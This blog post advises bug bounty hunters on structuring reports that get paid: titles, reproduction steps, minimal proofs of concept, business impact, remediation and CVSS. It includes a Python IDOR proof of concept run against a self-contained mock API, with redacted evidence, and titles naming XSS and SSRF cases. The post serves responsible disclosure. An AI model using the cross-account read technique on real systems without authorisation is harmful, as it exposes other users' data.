Writing Bug Bounty Reports That Get Paid: Structure, PoC, Impact
The difference between a triaged report and a rejected one is rarely the bug. It is the writing. Here is the structure that gets you paid: clear title, minimal PoC, business impact, and a remediation that the engineer can ship on Monday.
By Arjun Raghavan, Security & Systems Lead, BIPI · June 2, 2023 · 9 min read
Triagers read hundreds of reports a week
Your report competes with noise. If a triager cannot understand the bug, the impact, and the fix within ninety seconds, your report gets queued, deprioritised, or closed as informational.
The five-section structure
- Title that names the bug, the asset, and the impact in one line
- Summary in three sentences, no jargon
- Reproduction steps, numbered, copy-pasteable
- Proof of concept, minimal and self-contained
- Business impact and remediation
Title patterns that work
- IDOR on /api/orders/{id} allows reading any user invoice
- Stored XSS in profile bio leads to session theft for admin users
- SSRF in webhook URL field reaches AWS IMDS and returns IAM credentials
Bad titles say things like "security issue", "possible vulnerability", or "critical bug". They name neither the asset nor the impact, so they get skimmed and ignored.
Reproduction steps
Number every step. Include exact URLs, exact payloads, exact headers. Assume the triager has a fresh account and no context. If a step needs a specific account state, say so on line one.
Proof of concept
A good PoC is short, runs once, and demonstrates the impact without touching other users' data, creating persistent changes, or degrading the service. Read, do not write; prove access to one record, not thousands; redact what you retrieved. Screenshots help, but a curl one-liner or a thirty-second asciinema recording is better.
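What such a PoC looks like as a script, as an added example that is not from the original post. The target API, its two test accounts and the invoice data are constructed stand-ins served in-process so the script runs offline; the base URL, tokens and `/api/orders/{id}` path are assumptions to be replaced with the program's real assets. The script makes one read-only request per account, uses the victim's own request as a control so the triager can see the ID is valid, and redacts the evidence before it goes into the report.

```python
"""Minimal, non-destructive IDOR PoC (added example, not the original post's code).
The mock API below is a CONSTRUCTED stand-in for the target; its tokens,
accounts and invoice records are hypothetical."""
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# --- constructed stand-in target: any valid token can read any invoice (the IDOR) ---
TOKENS = {"tok-alice": "alice", "tok-bob": "bob"}  # hypothetical API tokens
INVOICES = {
    "1001": {"owner": "alice", "email": "alice@example.com", "total": "1200.00"},
    "1002": {"owner": "bob", "email": "bob@example.com", "total": "80.00"},
}


class MockAPI(BaseHTTPRequestHandler):
    def do_GET(self):
        token = self.headers.get("Authorization", "").replace("Bearer ", "")
        if token not in TOKENS:
            return self._send(401, {"error": "unauthorised"})
        if self.path.startswith("/api/orders/"):
            inv = INVOICES.get(self.path.rsplit("/", 1)[1])
            if inv is None:
                return self._send(404, {"error": "not found"})
            return self._send(200, inv)  # BUG: no ownership check -> IDOR
        self._send(404, {"error": "not found"})

    def _send(self, code, body):
        data = json.dumps(body).encode()
        self.send_response(code)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the PoC output clean
        pass


def start_mock():
    """Serve the stand-in API on a random loopback port in a background thread."""
    srv = HTTPServer(("127.0.0.1", 0), MockAPI)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_port}"


# --- the PoC itself: GET only, one request per account, evidence redacted ---
def get_invoice(base_url, token, invoice_id):
    req = Request(f"{base_url}/api/orders/{invoice_id}",
                  headers={"Authorization": f"Bearer {token}"})
    try:
        with urlopen(req, timeout=5) as resp:
            return resp.status, json.loads(resp.read())
    except HTTPError as err:
        return err.code, None


def redact(value):
    """Keep enough to prove the leak without pasting PII into the report."""
    if "@" in value:
        return value[:2] + "***" + value[value.index("@"):]
    return value[:2] + "***"


def prove_idor(base_url, victim_token, attacker_token, victim_invoice):
    # Control: the owner reads their own invoice, confirming the ID exists.
    own_status, own = get_invoice(base_url, victim_token, victim_invoice)
    # Test: an unrelated, unprivileged account requests the same ID.
    atk_status, cross = get_invoice(base_url, attacker_token, victim_invoice)
    vulnerable = own_status == 200 and atk_status == 200 and cross == own
    return {
        "vulnerable": vulnerable,
        "victim_status": own_status,
        "attacker_status": atk_status,
        "evidence": redact(cross["email"]) if vulnerable else None,
    }


if __name__ == "__main__":
    server, base = start_mock()
    print(json.dumps(prove_idor(base, "tok-alice", "tok-bob", "1001"), indent=2))
    server.shutdown()
```

The control request matters: without it, a triager cannot tell a genuine cross-account read from a guessed ID that happens to 200 for everyone. The redacted `evidence` field is what goes in the report; the raw response stays on your machine.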
Business impact, written for humans
Do not paste CVSS strings and expect the program to convert them into urgency. Translate the bug into money, trust, or compliance. Example: any logged-in user can read every invoice in the system, exposing PII for roughly two hundred thousand customers and violating DPDPA Section 8.
Remediation that ships
- Name the exact file or endpoint if you can
- Suggest the fix in one sentence, not a lecture
- Link to the framework's documented secure pattern
- Note any related endpoints that likely share the bug
CVSS, but used correctly
Include a CVSS 3.1 vector and a link to the calculator with your values pre-filled. Programs override your score anyway, but a well-justified vector signals seriousness.
What to never include
- Threats, deadlines, or hints of public disclosure
- Tool output dumps with no analysis
- Other companies you have reported to
- Speculation about impact you did not verify
Triagers reward clarity, not cleverness. Write the report you would want to receive at 9am on a Monday.
The submit checklist
- Title names bug, asset, impact
- Three-sentence summary at the top
- Reproduction steps tested from a fresh session
- Minimal PoC with no destructive side effects
- Business impact in plain language
- Remediation pointing to a specific code path
- CVSS vector with justification
A well-written medium often gets paid faster than a poorly written critical. Treat reporting as a craft, not an afterthought.